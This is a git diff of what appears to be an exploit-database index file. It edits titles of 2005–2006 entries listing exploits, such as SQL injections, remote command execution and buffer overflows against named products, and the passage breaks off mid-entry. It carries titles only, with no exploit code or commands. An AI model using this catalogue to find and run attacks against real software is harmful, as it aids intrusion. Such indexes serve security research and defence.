1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0 / 3.06 - Login Bypass SQL Injections",2005-12-30,DevilBox,asp,webapps,0 1400,platforms/php/webapps/1400.pl,"CuteNews 1.4.1 - (categories.mdu) Remote Command Execution Exploit",2006-01-01,cijfer,php,webapps,0 1401,platforms/php/webapps/1401.pl,"Valdersoft Shopping Cart 3.0 - Remote Command Execution Exploit",2006-01-03,cijfer,php,webapps,0 -1402,platforms/sco/local/1402.c,"SCO Openserver 5.0.7 - (termsh) Privilege Escalation",2006-01-03,prdelka,sco,local,0 +1402,platforms/sco/local/1402.c,"SCO OpenServer 5.0.7 - (termsh) Privilege Escalation",2006-01-03,prdelka,sco,local,0 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow (1)",2006-01-04,K4P0,windows,local,0 1404,platforms/windows/local/1404.c,"WinRAR 3.30 - Long Filename Buffer Overflow (2)",2006-01-04,c0d3r,windows,local,0 1405,platforms/php/webapps/1405.pl,"FlatCMS 1.01 - (file_editor.php) Remote Command Execution Exploit",2006-01-04,cijfer,php,webapps,0 @@ -1178,22 +1178,22 @@ id,file,description,date,author,platform,type,port 1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - (GET Request) Denial of Service",2006-01-07,FistFuXXer,windows,dos,0 1410,platforms/php/webapps/1410.pl,"Magic News Plus 1.0.3 - Admin Pass Change Exploit",2006-01-09,cijfer,php,webapps,0 1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - (Reboot) Denial of Service",2006-01-10,kokanin,hardware,dos,0 -1412,platforms/linux/local/1412.rb,"Xmame 0.102 - (-lang) Local Buffer Overflow",2006-01-10,xwings,linux,local,0 -1413,platforms/windows/remote/1413.c,"eStara Softphone 3.0.1.46 - (SIP) Remote Buffer Overflow (1)",2006-01-12,ZwelL,windows,remote,0 -1414,platforms/windows/remote/1414.pl,"eStara Softphone 3.0.1.46 - (SIP) Remote Buffer Overflow (2)",2006-01-12,kokanin,windows,remote,5060 -1415,platforms/linux/local/1415.c,"Xmame 0.102 - (lang) Local Buffer Overflow (C)",2006-01-13,Qnix,linux,local,0 +1412,platforms/linux/local/1412.rb,"Xmame 0.102 - '-lang' Local Buffer Overflow",2006-01-10,xwings,linux,local,0 +1413,platforms/windows/remote/1413.c,"eStara SoftPhone 3.0.1.46 - (SIP) Remote Buffer Overflow (1)",2006-01-12,ZwelL,windows,remote,0 +1414,platforms/windows/remote/1414.pl,"eStara SoftPhone 3.0.1.46 - (SIP) Remote Buffer Overflow (2)",2006-01-12,kokanin,windows,remote,5060 +1415,platforms/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow (C)",2006-01-13,Qnix,linux,local,0 1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0 1417,platforms/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 - (FTP) Remote System Access Exploit",2006-01-14,kokanin,windows,remote,22003 1418,platforms/asp/webapps/1418.txt,"MiniNuke 1.8.2 - Multiple SQL Injections",2006-01-14,nukedx,asp,webapps,0 1419,platforms/asp/webapps/1419.pl,"MiniNuke 1.8.2 - (news.asp hid) SQL Injection",2006-01-14,DetMyl,asp,webapps,0 -1420,platforms/windows/remote/1420.c,"Microsoft Windows - Metafile (WMF) Remote File Download Exploit Generator",2006-01-15,darkeagle,windows,remote,0 +1420,platforms/windows/remote/1420.c,"Microsoft Windows - Metafile (.WMF) Remote File Download Exploit Generator",2006-01-15,darkeagle,windows,remote,0 1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow Exploit",2006-01-16,"Patrick Thomassen",windows,remote,13701 1422,platforms/windows/dos/1422.c,"Cerberus FTP Server 2.32 - Denial of Service",2006-01-16,pi3ch,windows,dos,0 1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 1424,platforms/windows/dos/1424.pl,"TFTPD32 2.81 - (GET Request) Format String Denial of Service (PoC)",2006-01-19,"Critical Security",windows,dos,0 -1425,platforms/linux/local/1425.c,"Xmame 0.102 - (-pb/-lang/-rec) Local Buffer Overflow",2006-01-21,sj,linux,local,0 -1442,platforms/php/webapps/1442.pl,"ezDatabase 2.0 - (db_id) Remote Command Execution Exploit",2006-01-22,cijfer,php,webapps,0 -1445,platforms/linux/local/1445.c,"Eterm LibAST < 0.7 - (-X Option) Privilege Escalation",2006-01-24,"Johnny Mast",linux,local,0 +1425,platforms/linux/local/1425.c,"Xmame 0.102 - '-pb/-lang/-rec' Local Buffer Overflow",2006-01-21,sj,linux,local,0 +1442,platforms/php/webapps/1442.pl,"EZDatabase 2.0 - (db_id) Remote Command Execution Exploit",2006-01-22,cijfer,php,webapps,0 +1445,platforms/linux/local/1445.c,"Eterm LibAST < 0.7 - '-X' Option Privilege Escalation",2006-01-24,"Johnny Mast",linux,local,0 1446,platforms/php/webapps/1446.pl,"creLoaded 6.15 - (HTMLAREA) Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0 1447,platforms/hardware/dos/1447.c,"Cisco Aironet Wireless Access Points - Memory Exhaustion ARP Attack Denial of Service",2006-01-25,Pasv,hardware,dos,0 1448,platforms/windows/remote/1448.pl,"Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC)",2006-01-25,"Critical Security",windows,remote,0 @@ -1204,89 +1204,90 @@ id,file,description,date,author,platform,type,port 1456,platforms/linux/remote/1456.c,"SHOUTcast 1.9.4 - File Request Format String Exploit (Leaked)",2006-01-28,crash-x,linux,remote,8000 1457,platforms/php/webapps/1457.txt,"phpBB 2.0.19 - Cross-Site Scripting Remote Cookie Disclosure Exploit",2006-01-29,threesixthousan,php,webapps,0 1458,platforms/windows/remote/1458.cpp,"Winamp 5.12 - '.pls' Remote Buffer Overflow (1)",2006-01-29,ATmaCA,windows,remote,0 -1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - (cookie) Remote Command Execution Exploit",2006-01-30,cijfer,php,webapps,0 +1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution Exploit",2006-01-30,cijfer,php,webapps,0 1460,platforms/windows/remote/1460.pm,"Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)",2006-01-31,"H D Moore",windows,remote,0 1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection",2006-01-31,SkOd,php,webapps,0 1462,platforms/windows/remote/1462.cpp,"Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)",2006-01-31,HolyGhost,windows,remote,21 -1463,platforms/windows/remote/1463.pm,"SoftiaCom WMailserver 1.0 - SMTP Remote Buffer Overflow (Metasploit)",2006-02-01,y0,windows,remote,21 +1463,platforms/windows/remote/1463.pm,"SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)",2006-02-01,y0,windows,remote,21 1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 - (TelnetD) Remote Denial of Service",2006-02-02,"Fabian Ramirez",hardware,dos,0 1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Privilege Escalation (2)",2006-02-12,"Andres Tarasco",windows,local,0 1466,platforms/windows/remote/1466.pl,"eXchange POP3 5.0.050203 - (rcpt to) Remote Buffer Overflow",2006-02-03,"securma massine",windows,remote,25 -1467,platforms/php/webapps/1467.php,"LoudBlog 0.4 - (path) Arbitrary Remote File Inclusion Exploit",2006-02-03,rgod,php,webapps,0 +1467,platforms/php/webapps/1467.php,"LoudBlog 0.4 - (path) Arbitrary Remote File Inclusion",2006-02-03,rgod,php,webapps,0 1468,platforms/php/webapps/1468.php,"Clever Copy 3.0 - Admin Auth Details / SQL Injection",2006-02-04,rgod,php,webapps,0 1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection",2006-02-05,SkOd,php,webapps,0 -1470,platforms/windows/local/1470.c,"Microsoft HTML Help Workshop - (.hhp) Buffer Overflow (1)",2006-02-06,bratax,windows,local,0 +1470,platforms/windows/local/1470.c,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (1)",2006-02-06,bratax,windows,local,0 1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution Exploit",2006-02-06,Hessam-x,cgi,webapps,0 -1472,platforms/asp/webapps/1472.pl,"ASPThai.Net GuestBook 5.5 - (Authentication Bypass) SQL Injection",2006-02-06,Zodiac,asp,webapps,0 +1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - (Authentication Bypass) SQL Injection",2006-02-06,Zodiac,asp,webapps,0 1473,platforms/hardware/dos/1473.c,"Sony/Ericsson Bluetooth - (Reset Display) Denial of Service",2006-02-06,"Pierre Betouin",hardware,dos,0 1474,platforms/linux/remote/1474.pm,"Mozilla Firefox 1.5 (Linux) - location.QueryInterface() Code Execution (Metasploit)",2006-02-07,"H D Moore",linux,remote,0 1475,platforms/windows/dos/1475.html,"Microsoft Internet Explorer 7.0 Beta 2 - (urlmon.dll) Denial of Service",2006-02-07,"Tom Ferris",windows,dos,0 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - (phfont) Race Condition Privilege Escalation",2006-02-08,kokanin,qnx,local,0 -1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (OSX) (Metasploit)",2006-02-08,"H D Moore",osx,remote,0 +1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - (OS X) location.QueryInterface() Code Execution (Metasploit)",2006-02-08,"H D Moore",osx,remote,0 1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 - Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0 1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server 1.6 (Non Steam) - Denial of Service",2006-02-11,Firestorm,multiple,dos,0 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Arbitrary File Upload",2006-02-09,rgod,php,webapps,0 -1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - (class.forumposts.php) Arbitrary Remote File Inclusion Exploit",2006-02-09,rgod,php,webapps,0 +1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - (class.forumposts.php) Arbitrary Remote File Inclusion",2006-02-09,rgod,php,webapps,0 1486,platforms/linux/remote/1486.c,"Power Daemon 2.0.2 - (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532 1487,platforms/linux/remote/1487.c,"OpenVMPSd 1.3 - Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,1589 1488,platforms/windows/dos/1488.txt,"Microsoft HTML Help Workshop - '.hhp' Denial of Service",2006-02-10,darkeagle,windows,dos,0 1489,platforms/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - (Register Users) Denial of Service",2006-02-10,SkOd,multiple,dos,0 -1490,platforms/windows/local/1490.c,"Microsoft HTML Help Workshop - (.hhp) Buffer Overflow (2)",2006-02-11,k3xji,windows,local,0 +1490,platforms/windows/local/1490.c,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (2)",2006-02-11,k3xji,windows,local,0 1491,platforms/php/webapps/1491.php,"DocMGR 0.54.2 - (file_exists) Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0 1492,platforms/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection",2006-02-13,fRoGGz,php,webapps,0 1493,platforms/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 1494,platforms/php/webapps/1494.php,"FlySpray 0.9.7 - (install-0.9.7.php) Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 -1495,platforms/windows/local/1495.cpp,"Microsoft HTML Help Workshop - (.hhp) Buffer Overflow (3)",2006-02-14,darkeagle,windows,local,0 +1495,platforms/windows/local/1495.cpp,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (3)",2006-02-14,darkeagle,windows,local,0 1496,platforms/hardware/dos/1496.c,"D-Link Wireless Access Point - (Fragmented UDP) Denial of Service",2006-02-14,"Aaron Portnoy",hardware,dos,0 1498,platforms/php/webapps/1498.php,"webSPELL 4.01 - (title_op) SQL Injection",2006-02-14,x128,php,webapps,0 1499,platforms/php/webapps/1499.pl,"MyBulletinBoard (MyBB) 1.03 - Multiple SQL Injections",2006-02-15,"HACKERS PAL",php,webapps,0 -1500,platforms/windows/dos/1500.cpp,"Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0 +1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0 1501,platforms/php/webapps/1501.php,"PHPKIT 1.6.1R2 - (filecheck) Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0 -1502,platforms/windows/remote/1502.py,"Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2)",2006-02-16,redsand,windows,remote,0 +1502,platforms/windows/remote/1502.py,"Microsoft Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2)",2006-02-16,redsand,windows,remote,0 1503,platforms/php/webapps/1503.pl,"YapBB 1.2 - (cfgIncludeDirectory) Remote Command Execution Exploit",2006-02-16,cijfer,php,webapps,0 1504,platforms/windows/remote/1504.pm,"Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)",2006-02-17,"H D Moore",windows,remote,0 1505,platforms/windows/remote/1505.html,"Microsoft Windows Media Player 10 - Plugin Overflow (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote,0 1506,platforms/windows/remote/1506.c,"Microsoft Windows - Color Management Module Overflow (MS05-036) (2)",2006-02-17,darkeagle,windows,remote,0 1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 - (referer) Remote Command Execution Exploit",2006-02-17,RusH,cgi,webapps,0 1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - (rollid) SQL Injection",2006-02-17,RusH,php,webapps,0 -1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - (csscontent) Remote Code Execution Exploit",2006-02-17,RusH,php,webapps,0 +1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - (csscontent) Remote Code Execution",2006-02-17,RusH,php,webapps,0 1511,platforms/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Exploit",2006-02-17,rgod,php,webapps,0 -1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - (X-Forwarded-For) Remote Command Execution Exploit",2006-02-19,rgod,php,webapps,0 +1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - (x-forwarded-for) Remote Command Execution Exploit",2006-02-19,rgod,php,webapps,0 1513,platforms/php/webapps/1513.php,"BXCP 0.2.9.9 - (tid) SQL Injection",2006-02-19,x128,php,webapps,0 1514,platforms/asp/webapps/1514.pl,"MiniNuke 1.8.2b - (pages.asp) SQL Injection",2006-02-19,nukedx,asp,webapps,0 1515,platforms/php/webapps/1515.pl,"GeekLog 1.x - (error.log) Remote Commands Execution Exploit (gpc = Off)",2006-02-20,rgod,php,webapps,0 1516,platforms/php/webapps/1516.php,"ilchClan 1.05g - (tid) SQL Injection",2006-02-20,x128,php,webapps,0 1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial of Service",2006-02-20,K4P0,php,dos,0 1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Privilege Escalation",2006-02-20,"Marco Ivaldi",linux,local,0 -1519,platforms/osx/remote/1519.pm,"Mac OSX Safari Browser - (Safe File) Remote Code Execution Exploit (Metasploit)",2006-02-22,"H D Moore",osx,remote,0 +1519,platforms/osx/remote/1519.pm,"Apple Mac OS X Safari Browser - (Safe File) Remote Code Execution (Metasploit)",2006-02-22,"H D Moore",osx,remote,0 1520,platforms/windows/remote/1520.pl,"Microsoft Windows Media Player - Plugin Overflow (MS06-006) (3)",2006-02-22,"Matthew Murphy",windows,remote,0 1521,platforms/php/webapps/1521.php,"Noahs Classifieds 1.3 - (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0 -1522,platforms/php/webapps/1522.php,"NOCC Webmail 1.0 - (Local Inclusion) Remote Code Execution Exploit",2006-02-23,rgod,php,webapps,0 +1522,platforms/php/webapps/1522.php,"NOCC Webmail 1.0 - (Local Inclusion) Remote Code Execution",2006-02-23,rgod,php,webapps,0 1523,platforms/php/webapps/1523.cpp,"PHP-Nuke 7.5 - 7.8 (Search) SQL Injection",2006-02-23,unitedbr,php,webapps,0 1524,platforms/php/webapps/1524.htm,"VHCS 2.4.7.1 - (Add User) Authentication Bypass Exploit",2006-02-23,RoMaNSoFt,php,webapps,0 1525,platforms/php/webapps/1525.pl,"phpWebSite 0.10.0-full - (topics.php) SQL Injection",2006-02-24,SnIpEr_SA,php,webapps,0 1526,platforms/php/webapps/1526.php,"Lansuite 2.1.0 Beta - (fid) SQL Injection",2006-02-24,x128,php,webapps,0 -1527,platforms/php/webapps/1527.pl,"iGENUS WebMail 2.0.2 - (config_inc.php) Remote Code Execution Exploit",2006-02-25,rgod,php,webapps,0 +1527,platforms/php/webapps/1527.pl,"iGENUS WebMail 2.0.2 - (config_inc.php) Remote Code Execution",2006-02-25,rgod,php,webapps,0 1528,platforms/asp/webapps/1528.pl,"Pentacle In-Out Board 6.03 - (newsdetailsview) SQL Injection",2006-02-25,nukedx,asp,webapps,0 -1529,platforms/asp/webapps/1529.htm,"Pentacle In-Out Board 6.03 - (login.asp) Remote Authentication Bypass",2006-02-25,nukedx,asp,webapps,0 +1529,platforms/asp/webapps/1529.htm,"Pentacle In-Out Board 6.03 - 'login.asp' Remote Authentication Bypass",2006-02-25,nukedx,asp,webapps,0 1530,platforms/php/webapps/1530.pl,"SaphpLesson 2.0 - (forumid) SQL Injection",2006-02-25,SnIpEr_SA,php,webapps,0 1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos,0 1532,platforms/php/webapps/1532.pl,"PwsPHP 1.2.3 - 'index.php' SQL Injection",2006-02-25,papipsycho,php,webapps,0 -1533,platforms/php/webapps/1533.php,"4Images 1.7.1 - (Local Inclusion) Remote Code Execution Exploit",2006-02-26,rgod,php,webapps,0 +1533,platforms/php/webapps/1533.php,"4Images 1.7.1 - (Local Inclusion) Remote Code Execution",2006-02-26,rgod,php,webapps,0 1534,platforms/sco/local/1534.c,"SCO Unixware 7.1.3 - (ptrace) Privilege Escalation",2006-02-26,prdelka,sco,local,0 1535,platforms/windows/dos/1535.c,"CrossFire 1.8.0 - (oldsocketmode) Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",windows,dos,0 1536,platforms/windows/remote/1536.pm,"Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote Exploit (Metasploit)",2006-02-28,"H D Moore",windows,remote,0 1537,platforms/windows/remote/1537.pm,"Kerio Personal Firewall 2.1.4 - Remote Authentication Packet Overflow (Metasploit)",2006-02-28,y0,windows,remote,44334 -1538,platforms/php/webapps/1538.pl,"farsinews 2.5 - Directory Traversal arbitrary (users.db) access Exploit",2006-02-28,Hessam-x,php,webapps,0 +1538,platforms/php/webapps/1538.pl,"Farsinews 2.5 - Directory Traversal Arbitrary (users.db) access Exploit",2006-02-28,Hessam-x,php,webapps,0 1539,platforms/php/webapps/1539.txt,"MyBulletinBoard (MyBB) 1.03 - (misc.php COMMA) SQL Injection",2006-02-28,Devil-00,php,webapps,0 1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service",2006-02-28,"Evgeny Legerov",bsd,dos,0 -1541,platforms/php/webapps/1541.pl,"Limbo CMS 1.0.4.2 - (ItemID) Remote Code Execution Exploit",2006-03-01,str0ke,php,webapps,0 +1541,platforms/php/webapps/1541.pl,"Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution",2006-03-01,str0ke,php,webapps,0 1542,platforms/php/webapps/1542.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)",2006-03-01,LorD,php,webapps,0 -1543,platforms/php/webapps/1543.pl,"vuBB 0.2 - (Cookie) Final SQL Injection (mq=off)",2006-03-01,KingOfSka,php,webapps,0 +1543,platforms/php/webapps/1543.pl,"vuBB 0.2 - 'cookie' Final SQL Injection (mq=off)",2006-03-01,KingOfSka,php,webapps,0 1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x - Datenbank MOD (fileid) SQL Injection",2006-03-01,nukedx,php,webapps,0 -1545,platforms/osx/local/1545.pl,"Apple Mac OSX - (/usr/bin/passwd) Custom Passwd Privilege Escalation",2006-03-01,vade79,osx,local,0 +1545,platforms/osx/local/1545.pl,"Apple Mac OS X - '/usr/bin/passwd' Custom Passwd Privilege Escalation",2006-03-01,vade79,osx,local,0 +40340,platforms/windows/local/40340.txt,"WIN-911 7.17.00 - Multiple Vulnerabilities",2016-09-06,sh4d0wman,windows,local,0 1546,platforms/php/webapps/1546.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps,0 1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities (PoC)",2006-03-02,lorenzo,php,webapps,0 1548,platforms/php/webapps/1548.pl,"MyBulletinBoard (MyBB) 1.04 - (misc.php COMMA) SQL Injection (2)",2006-03-03,Devil-00,php,webapps,0 @@ -1294,7 +1295,7 @@ id,file,description,date,author,platform,type,port 1550,platforms/asp/webapps/1550.txt,"TotalECommerce 1.0 - (index.asp id) SQL Injection",2006-03-04,nukedx,asp,webapps,0 1551,platforms/hardware/dos/1551.txt,"Multiple Routers - (IRC Request) Disconnect Denial of Service",2006-03-04,"Ryan Meyer",hardware,dos,0 1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 - (Port) Remote Overflow (PoC)",2006-03-04,luka.research,windows,dos,0 -1553,platforms/php/webapps/1553.pl,"Fantastic News 2.1.2 - (script_path) Remote Code Execution Exploit",2006-03-04,uid0,php,webapps,0 +1553,platforms/php/webapps/1553.pl,"Fantastic News 2.1.2 - (script_path) Remote Code Execution",2006-03-04,uid0,php,webapps,0 1554,platforms/multiple/local/1554.c,"LibTiff 3.7.1 - (BitsPerSample Tag) Local Buffer Overflow",2006-03-05,"Agustin Gianni",multiple,local,0 1555,platforms/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 - '.dbp' Buffer Overflow",2006-03-05,Kozan,windows,local,0 1556,platforms/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod - (load) SQL Injection",2006-03-06,SkOd,php,webapps,0 @@ -1302,9 +1303,9 @@ id,file,description,date,author,platform,type,port 1558,platforms/windows/dos/1558.c,"LieroX 0.62b - Remote Server/Client Denial of Service",2006-03-06,"Luigi Auriemma",windows,dos,0 1559,platforms/windows/dos/1559.c,"Sauerbraten 2006_02_28 - Multiple Buffer Overflow/Crash Vulnerabilities",2006-03-06,"Luigi Auriemma",windows,dos,0 1560,platforms/windows/dos/1560.c,"Cube 2005_08_29 - Multiple Buffer Overflow/Crash Vulnerabilities",2006-03-06,"Luigi Auriemma",windows,dos,0 -1561,platforms/php/webapps/1561.pl,"OWL Intranet Engine 0.82 - (xrms_file_root) Code Execution Exploit",2006-03-07,rgod,php,webapps,0 +1561,platforms/php/webapps/1561.pl,"OWL Intranet Engine 0.82 - (xrms_file_root) Code Execution",2006-03-07,rgod,php,webapps,0 1562,platforms/asp/webapps/1562.pl,"CilemNews System 1.1 - (yazdir.asp haber_id) SQL Injection",2006-03-07,nukedx,asp,webapps,0 -1563,platforms/php/webapps/1563.pm,"Limbo CMS 1.0.4.2 - (ItemID) Remote Code Execution Exploit (Metasploit)",2006-03-07,sirh0t,php,webapps,0 +1563,platforms/php/webapps/1563.pm,"Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution (Metasploit)",2006-03-07,sirh0t,php,webapps,0 1564,platforms/windows/dos/1564.c,"Alien Arena 2006 Gold Edition 5.00 - Multiple Vulnerabilities",2006-03-07,"Luigi Auriemma",windows,dos,0 1565,platforms/windows/remote/1565.pl,"RevilloC MailServer 1.21 - (USER) Remote Buffer Overflow (PoC)",2006-03-07,"securma massine",windows,remote,110 1566,platforms/php/webapps/1566.php,"Gallery 2.0.3 - stepOrder[] Remote Commands Execution Exploit",2006-03-08,rgod,php,webapps,0 @@ -1315,48 +1316,48 @@ id,file,description,date,author,platform,type,port 1572,platforms/multiple/dos/1572.pl,"Dropbear / OpenSSH Server - (MAX_UNAUTH_CLIENTS) Denial of Service",2006-03-10,str0ke,multiple,dos,0 1573,platforms/php/dos/1573.php,"Guppy 4.5.11 - (Delete Databases) Remote Denial of Service",2006-03-10,trueend5,php,dos,0 1574,platforms/linux/remote/1574.c,"PeerCast 0.1216 - (nextCGIarg) Remote Buffer Overflow (1)",2006-03-11,prdelka,linux,remote,7144 -1575,platforms/php/webapps/1575.pl,"GuestBook Script 1.7 - (include_files) Remote Code Execution Exploit",2006-03-11,rgod,php,webapps,0 +1575,platforms/php/webapps/1575.pl,"Guestbook Script 1.7 - (include_files) Remote Code Execution",2006-03-11,rgod,php,webapps,0 1576,platforms/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Attack Vectors",2006-03-11,Nomenumbra,php,webapps,0 1577,platforms/irix/local/1577.sh,"SGI IRIX 6.5.28 - (runpriv) Design Error",2005-10-10,anonymous,irix,local,0 1578,platforms/linux/remote/1578.c,"PeerCast 0.1216 - (nextCGIarg) Remote Buffer Overflow (2)",2006-03-12,darkeagle,linux,remote,7144 1579,platforms/linux/local/1579.pl,"Ubuntu 5.10 - Installer Password Disclosure",2006-03-12,"Kristian Hermansen",linux,local,0 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution Exploit",2006-03-13,rgod,php,webapps,0 1582,platforms/linux/remote/1582.c,"crossfire-server 1.9.0 - SetUp() Remote Buffer Overflow",2006-03-13,landser,linux,remote,13327 -1583,platforms/osx/remote/1583.pl,"Apple Mac OSX 10.4.5 Mail.app - (Real Name) Buffer Overflow",2006-03-13,"Kevin Finisterre",osx,remote,25 +1583,platforms/osx/remote/1583.pl,"Apple Mac OS X 10.4.5 Mail.app - (Real Name) Buffer Overflow",2006-03-13,"Kevin Finisterre",osx,remote,25 1584,platforms/windows/local/1584.cpp,"Microsoft Windows - Telephony Service Command Execution Exploit (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local,0 -1585,platforms/php/webapps/1585.php,"PHP iCalendar 2.21 - (Cookie) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 -1586,platforms/php/webapps/1586.php,"PHP iCalendar 2.21 - (publish.ical.php) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0 -1587,platforms/php/webapps/1587.pl,"KnowledgebasePublisher 1.2 - (include) Remote Code Execution Exploit",2006-03-15,uid0,php,webapps,0 +1585,platforms/php/webapps/1585.php,"PHP iCalendar 2.21 - 'cookie' Remote Code Execution",2006-03-15,rgod,php,webapps,0 +1586,platforms/php/webapps/1586.php,"PHP iCalendar 2.21 - (publish.ical.php) Remote Code Execution",2006-03-15,rgod,php,webapps,0 +1587,platforms/php/webapps/1587.pl,"KnowledgebasePublisher 1.2 - 'Include' Remote Code Execution",2006-03-15,uid0,php,webapps,0 1588,platforms/php/webapps/1588.php,"nodez 4.6.1.1 mercury - Multiple Vulnerabilities",2006-03-18,rgod,php,webapps,0 -1589,platforms/asp/webapps/1589.pl,"BetaParticle Blog 6.0 - (fldGalleryID) SQL Injection",2006-03-18,nukedx,asp,webapps,0 -1590,platforms/php/webapps/1590.pl,"ShoutLIVE 1.1.0 - (savesettings.php) Remote Code Execution Exploit",2006-03-18,DarkFig,php,webapps,0 +1589,platforms/asp/webapps/1589.pl,"BetaParticle Blog 6.0 - 'fldGalleryID' SQL Injection",2006-03-18,nukedx,asp,webapps,0 +1590,platforms/php/webapps/1590.pl,"ShoutLIVE 1.1.0 - (savesettings.php) Remote Code Execution",2006-03-18,DarkFig,php,webapps,0 1591,platforms/linux/local/1591.py,"Python 2.4.2 - realpath() Local Stack Overflow",2006-03-18,"Gotfault Security",linux,local,0 -1592,platforms/windows/remote/1592.c,"Mercur Mailserver 5.0 SP3 - (IMAP) Remote Buffer Overflow (1)",2006-03-19,pLL,windows,remote,0 -1593,platforms/windows/dos/1593.c,"Mercur Mailserver 5.0 SP3 - (IMAP) Denial of Service",2006-03-19,Omni,windows,dos,0 +1592,platforms/windows/remote/1592.c,"Mercur MailServer 5.0 SP3 - (IMAP) Remote Buffer Overflow (1)",2006-03-19,pLL,windows,remote,0 +1593,platforms/windows/dos/1593.c,"Mercur MailServer 5.0 SP3 - (IMAP) Denial of Service",2006-03-19,Omni,windows,dos,0 1594,platforms/php/webapps/1594.py,"SoftBB 0.1 - (mail) Blind 